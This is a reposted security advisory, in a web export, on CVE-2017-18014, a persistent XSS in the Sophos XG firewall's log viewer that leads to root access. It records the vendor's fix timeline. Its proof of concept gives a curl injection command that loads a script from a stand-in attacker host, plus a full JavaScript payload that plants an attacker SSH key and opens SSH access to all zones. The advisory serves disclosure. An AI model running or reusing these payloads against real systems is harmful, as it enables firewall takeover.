{"id":11197,"date":"2018-01-22T14:19:22","date_gmt":"2018-01-22T22:19:22","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/01\/22\/news-4968\/"},"modified":"2018-01-22T14:19:22","modified_gmt":"2018-01-22T22:19:22","slug":"news-4968","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/01\/22\/news-4968\/","title":{"rendered":"SSD Advisory - Sophos XG From Unauthenticated Persistent XSS to Root Access"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Mon, 22 Jan 2018 11:52:38 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\">ssd@beyondsecurity.com<\/a><br \/> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a persistent XSS vulnerability found in Sophos XG 17 which, when successfully exploited, leads to root access.<\/p>\n<p>Sophos XG Firewall: &#8220;The all-new Control Center provides unprecedented visibility into your network. Get rich reporting, and add Sophos iView for centralized reporting across multiple firewalls.&#8221;<\/p>\n<p><span 
id=\"more-3645\"><\/span><\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security&#8217;s SSD.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> Sophos has been informed of the vulnerability; their response was:<\/p>\n<ul>\n<li>On December 11 we received and acknowledged your submission<\/li>\n<li>On December 12 we confirmed the issue and started working on a fix<\/li>\n<li>On December 20 we released the official fix for XG v17 MR3: https:\/\/community.sophos.com\/products\/xg-firewall\/b\/xg-blog\/posts\/sfos-17-0-3-mr3-released<\/li>\n<li>On December 29 we completed the fixes for the previously released XG v16, v16.5 and v17 versions<\/li>\n<li>On December 31, as you requested, we published our security advisory: https:\/\/community.sophos.com\/kb\/en-us\/128024?elqTrackId=3a6db4656f654d65b352f526d26c6a17&#038;elq=1514ab02d2764e8cb73e6b0bdbe7e7be&#038;elqaid=2739&#038;elqat=1&#038;elqCampaignId=27053<\/li>\n<\/ul>\n<p>CVE: CVE-2017-18014<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> An unauthenticated user can trigger a persistent XSS in the WAF log page of the webadmin interface (Control Center &gt; Log Viewer, with the filter option &#8220;Web Server Protection&#8221;). The injected script can perform any action the firewall webadmin can perform (create new users, enable ssh and add ssh authorized keys, etc.).<\/p>\n<p>To trigger the vulnerability we demonstrate the following scenario:<\/p>\n<ul>\n<li>Sophos XG Firewall configured with 3 zones: Trusted, Untrusted, DMZ<\/li>\n<li>A web server is placed in the DMZ<\/li>\n<li>The firewall protects the web server with the default Web Application Firewall (WAF) configuration recommended by Sophos.<\/li>\n<li>An attacker on the Untrusted network sends a URL request to the web server in the DMZ, causing a script to be injected into the WAF log page<\/li>\n<li>An administrator on the Trusted network visits the WAF log page<\/li>\n<li>Without any further interaction or warning, the script adds an SSH authorized key to the admin user and allows ssh administration from Untrusted.<\/li>\n<li>The attacker obtains a full root ssh shell<\/li>\n<\/ul>\n<p>The Sophos XG WAF log page renders the &#8220;User-Agent&#8221; parameter of the POST request without escaping, so script embedded in it executes in the administrator&#8217;s browser.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2.jpg\" data-slb-active=\"1\" data-slb-asset=\"1866928938\" data-slb-internal=\"0\" data-slb-group=\"3645\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" class=\"alignnone size-medium wp-image-3615\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-300x169.jpg 300w, 
https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-768x432.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-1024x576.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2.jpg 1280w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><u>Sophos XG configuration:<\/u><\/p>\n<ul>\n<li>Firewall interface Trusted &#8211; 192.168.10.190, Port A<\/li>\n<li>Firewall interface Untrusted &#8211; 192.168.0.192, Port B<\/li>\n<li>Firewall interface DMZ &#8211; 192.168.20.190, Port C<\/li>\n<\/ul>\n<p><u>Environment<\/u><\/p>\n<ul>\n<li>Sophos XG Firewall admin interface at https:\/\/192.168.10.190:4444\/webconsole\/webpages\/login.jsp<\/li>\n<li>Admin PC on the Trusted network, IP: 192.168.10.191<\/li>\n<li>&#8220;Webserver&#8221; on the DMZ network (a netcat listener is sufficient), IP: 192.168.20.191<\/li>\n<li>Attacker-controlled website on the Untrusted network, IP: 192.168.0.12<\/li>\n<\/ul>\n<p>On the attacker PC, create an ssh authentication key (empty passphrase):<\/p>\n<pre>ssh-keygen -t rsa<\/pre>\n<p>Then read the public key; this key will be used in the attack.<\/p>\n<p>Note that when inserting the key into the attack script, part of the key must be encoded: every &#8220;+&#8221; must be replaced with &#8220;%2B&#8221; (the key travels in a form-urlencoded body, where a literal + would decode to a space).<\/p>\n<p>Modify the 17.js script (see below), replacing ===&gt;INSERT-YOUR-PUB-KEY&lt;=== with your public key, and change the host that serves 17.js to your website. Now run the following cURL command to inject the &#8220;User-Agent&#8221;:<\/p>\n<div id=\"crayon-5a66636a489ad306075240\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px 
!important; line-height: 15px !important;\">curl \"http:\/\/WEBSERVER.COM\" -H \"Host: 192.168.0.192\" -H \"User-Agent:PERU&lt;i hidden&gt;&lt;iframe onload=\"function JS(){var iH = document.getElementsByTagName('head')[0];var my = document.createElement('script');my.type = 'text\/javascript';my.src = 'https:\/\/www.AttackerControlledWebsite.COM\/17.js';iH.appendChild(my);};JS();\"&gt;&lt;\/iframe&gt;&lt;\/i&gt;peru\"\n\nTo trigger the attack, from the admin PC go to the log page (Log Viewer &gt; Web Server Protection) and move the mouse over the packet details.\n\nConnect to Sophos XG using ssh from the attack PC (the username is admin).\n\n17.js:\n\n\/\/ Two hidden iframes receive the responses of the two requests below.\nvar iframe1 = document.createElement('iframe');\niframe1.id = 'peruid';\niframe1.style = 'width:0; height:0; border:0; border:none; visibility:0';\ndocument.body.appendChild(iframe1);\nvar iframe2 = document.createElement('iframe');\niframe2.id = 'peruid2';\niframe2.style = 'width:0; height:0; border:0; border:none; visibility:0';\ndocument.body.appendChild(iframe2);\n\/\/ The script runs in the admin's webconsole session: the origin and the\n\/\/ CSRF token are both taken from the URL of the page the admin is viewing.\nvar url = window.location.href;\nvar arr = url.split('\/');\nvar IPV = arr[0] + '\/\/' + arr[2];\nvar arr2 = url.split('=');\nvar csrf = arr2[2];\n\/\/ Request 1: add the attacker's public key to the admin account and\n\/\/ enable public-key authentication for it.\nvar ajax = '{\"username\":\"admin\",\"allowpubkeyauth\":\"1\",\"sshkey\":[\"===&gt;INSERT-YOUR-PUB-KEY&lt;===\"]}';\nvar param = \"csrf=\"+csrf+\"&amp;mode=2501&amp;Event=UPDATE&amp;Entity=PublicKeyAuth&amp;json=\"+ajax+\"&amp;__RequestType=ajax&amp;t=1507131213973\";\nvar xhttp = new XMLHttpRequest();\nxhttp.open('POST', IPV+'\/webconsole\/Controller', true);\nxhttp.setRequestHeader(\"Content-type\", \"application\/x-www-form-urlencoded\");\nxhttp.onreadystatechange = function() {\n  if (xhttp.readyState == 4 &amp;&amp; xhttp.status == 200) {\n    var doc = document.getElementById(\"peruid\").contentWindow.document;\n    doc.open();\n    doc.write(xhttp.responseText);\n    doc.close();\n  }\n}\nxhttp.send(param);\n\/\/ Request 2: update the local service ACL so that ssh administration is\n\/\/ allowed from every zone, including Untrusted.\nvar ajax2 = '{\"localaclid\":[\"LAN#2\",\"LAN#4\",\"LAN#6\",\"LAN#13\",\"LAN#5\",\"LAN#9\",\"LAN#8\",\"LAN#14\",\"LAN#10\",\"LAN#7\",\"LAN#38\",\"LAN#23\",\"LAN#18\",\"WAN#4\",\"WAN#10\",\"WAN#38\",\"DMZ#10\",\"DMZ#38\",\"DMZ#18\",\"VPN#18\",\"WiFi#2\",\"WiFi#4\",\"WiFi#6\",\"WiFi#13\",\"WiFi#5\",\"WiFi#9\",\"WiFi#8\",\"WiFi#14\",\"WiFi#10\",\"WiFi#7\",\"WiFi#38\",\"WiFi#23\",\"WiFi#18\"]}';\nvar param2 = \"csrf=\"+csrf+\"&amp;mode=72&amp;json=\"+ajax2+\"&amp;__RequestType=ajax\";\nvar xhttp2 = new XMLHttpRequest();\nxhttp2.open('POST', IPV+'\/webconsole\/Controller', true);\nxhttp2.setRequestHeader(\"Content-type\", \"application\/x-www-form-urlencoded\");\nxhttp2.onreadystatechange = function() {\n  if (xhttp2.readyState == 4 &amp;&amp; xhttp2.status == 200) {\n    var doc = document.getElementById(\"peruid2\").contentWindow.document;\n    doc.open();\n    doc.write(xhttp2.responseText);\n    doc.close();\n  }\n}\nxhttp2.send(param2);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 
15px !important;\">\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-1\"><span class=\"crayon-i\">curl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;http:\/\/WEBSERVER.COM&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">H<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Host: 192.168.0.192&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">H<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;User-Agent:PERU&lt;i hidden&gt;&lt;iframe onload=&#8221;function JS(){var iH = document.getElementsByTagName(&#8216;head&#8217;)[0];var my = document.createElement(&#8216;script&#8217;);my.type = &#8216;text\/javascript&#8217;;my.src = &#8216;https:\/\/www.AttackerControlledWebsite.COM\/17.js&#8217;;iH.appendChild(my);};JS();&#8221;&gt;&lt;\/iframe&gt;&lt;\/i&gt;peru&#8221;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5a66636a489ad306075240-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-3\"><span class=\"crayon-st\">To<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">trigger <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">attack<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">admin <\/span><span class=\"crayon-v\">PC<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">go <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">log <\/span><span class=\"crayon-e\">page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Log <\/span><span class=\"crayon-v\">Viewer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Web <\/span><span class=\"crayon-e\">Server <\/span><span class=\"crayon-v\">Protection<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">move <\/span><span class=\"crayon-e\">mouse <\/span><span class=\"crayon-e\">over <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">packet <\/span><span class=\"crayon-e\">details <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-5\"><span class=\"crayon-e\">Connect <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Sophos <\/span><span class=\"crayon-e\">XG <\/span><span class=\"crayon-e\">using <\/span><span class=\"crayon-e\">ssh <\/span><span class=\"crayon-e\">from 
<\/span><span class=\"crayon-e\">attack <\/span><span class=\"crayon-e\">PC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">username <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-7\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">u<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">17.js<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">u<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-9\"><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-10\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">pre <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;lang:default decode:true &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;iframe&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5a66636a489ad306075240-11\"><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;peruid&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-12\"><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;width:0; height:0; border:0; border:none; vivibility:0&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-13\"><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-14\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;iframe&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-15\"><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;peruid2&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-16\"><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;width:0; height:0; border:0; border:none; vivibility:0&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-17\"><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-18\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">window<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">location<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-19\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-s\">&#8216;\/&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-20\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IPV<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\/\/&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-21\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;=&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-22\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">csrf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr2<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span 
class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-23\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ajax<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{&#8220;username&#8221;:&#8221;admin&#8221;,&#8221;allowpubkeyauth&#8221;:&#8221;1&#8243;,&#8221;sshkey&#8221;:[&#8220;===&gt;INSERT-YOUR-PUB-KEY&lt;===&#8221;]}&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-24\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">param<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;csrf=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">csrf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;mode=2501&amp;Event=UPDATE&amp;Entity=PublicKeyAuth&amp;json=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">ajax<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;__RequestType=ajax&amp;t=1507131213973&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-25\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XMLHttpRequest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-26\"><span 
class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;POST&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IPV<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/webconsole\/Controller&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-27\"><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setRequestHeader<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Content-type&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;application\/x-www-form-urlencoded&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-28\"><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">onreadystatechange<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-29\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">readyState<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getElementById<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;peruid&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">contentWindow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">responseText<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636a489ad306075240-35\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636a489ad306075240-36\"><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">send<\/span><span 